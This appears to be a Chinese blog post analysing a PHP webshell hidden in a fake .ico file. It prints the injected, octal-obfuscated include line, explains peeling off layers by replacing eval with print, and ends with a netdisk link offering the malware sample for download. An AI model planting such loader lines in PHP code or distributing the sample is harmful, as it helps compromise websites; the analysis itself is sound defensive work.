第一步 获取ico文件,其实就是个php文件
一般是php 文件被加入
<?php @include ".2a35bf57.ico"; 这一行代码 ,这个代码也是被加密的,如下 /*e05a0*/ //@include "\104:/\167ww\057fz\145rp\056ne\164/.\14653\141fa\061d.\151co"; /*e05a0*/ # 第二步 这个ico文件也是加密的,最后一个eval 函数,改为print,运行php文件又出现 被加密的php代码,如下。 修改后的文件如下:![在这里插入图片描述](https://img-blog.csdnimg.cn/2019030716014996.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3F4aW5mbw==,size_16,color_FFFFFF,t_70) 执行后的php代码如下: ![在这里插入图片描述](https://img-blog.csdnimg.cn/20190307160356216.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3F4aW5mbw==,size_16,color_FFFFFF,t_70) 很用心的黑客,又把代码加密了一次,另存成php文件后,再继续执行php文件。 # 获取最终的代码如下。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20190307160553482.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3F4aW5mbw==,size_16,color_FFFFFF,t_70) 这个代码还算完整,就是被混淆了,基本上能看懂了,绝对是php高手写的代码。 有兴趣的朋友可以来这里分析挂马的程序。 链接:https://pan.baidu.com/s/1zkWEStTt17BwWofXzHDQrg 提取码:7b54 复制这段内容后打开百度网盘手机App,操作更方便哦